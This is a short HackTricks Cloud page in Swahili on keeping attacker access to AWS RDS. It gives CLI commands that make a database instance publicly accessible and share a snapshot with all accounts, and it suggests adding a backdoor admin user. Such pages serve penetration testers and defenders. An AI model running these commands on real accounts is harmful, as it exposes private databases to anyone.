HackTricks CloudAWS - RDS Persistence
Reading time: 2 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
RDS
Kwa maelezo zaidi angalia:
AWS - Relational Database (RDS) Enum
Fanya mfano uweze kupatikana hadharani: rds:ModifyDBInstance
Mshambuliaji mwenye ruhusa hii anaweza kubadilisha mfano wa RDS uliopo ili kuwezesha upatikanaji wa hadharani.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
Unda mtumiaji wa admin ndani ya DB
Mshambuliaji anaweza tu kuunda mtumiaji ndani ya DB hivyo hata kama nenosiri la mtumiaji mkuu limebadilishwa hampotezi ufikiaji wa hifadhidata.
Fanya picha kuwa ya umma
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.